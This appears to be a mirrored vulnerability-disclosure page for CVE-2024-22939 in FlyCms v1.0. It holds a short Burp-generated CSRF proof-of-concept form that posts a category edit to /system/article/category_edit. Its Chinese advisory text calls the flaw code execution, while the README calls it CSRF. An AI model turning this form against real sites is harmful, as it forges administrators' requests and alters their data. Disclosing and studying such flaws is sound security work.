CVE-2024-22939 PoC — FlyCms 安全漏洞

Source

https://github.com/NUDTTAN91/CVE-2024-22939

Associated Vulnerability

Title:FlyCms 安全漏洞 (CVE-2024-22939)
Description:sunkaifei FlyCms是sunkaifei开源的一个应用程序。一个类似知乎以问答为基础的完全开源的JAVA语言开发的社交网络建站程序。 FlyCms v.1.0版本存在安全漏洞。远程攻击者利用该漏洞通过 system/article/category_edit 组件执行任意代码。

Description

CVE-2024-22939

Readme

target:https://github.com/sunkaifei/FlyCms
version: v1.0

FlyCms v1.0 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /system/article/category_edit

![image-20240108165756056](./image/image-20240109075756056.png)



Poc

```
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.247.192/system/article/category_edit?id=1&name=%E7%A7%BB%E5%8A%A8%E5%BC%80%E5%8F%91123" method="POST">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>



```



![image-20240108165931640](./image/image-20240109075931640.png)



Success:

![image-20240108170027562](./image/image-20240109080027562.png)

File Snapshot


 [4.0K]  /data/pocs/75399d6a8d210acfe74d2d1684da03835793fd00
├── [4.0K]  image
│   ├── [ 30K]  image-20240109075756056.png
│   ├── [132K]  image-20240109075931640.png
│   └── [ 28K]  image-20240109080027562.png
└── [ 753]  README.md

1 directory, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!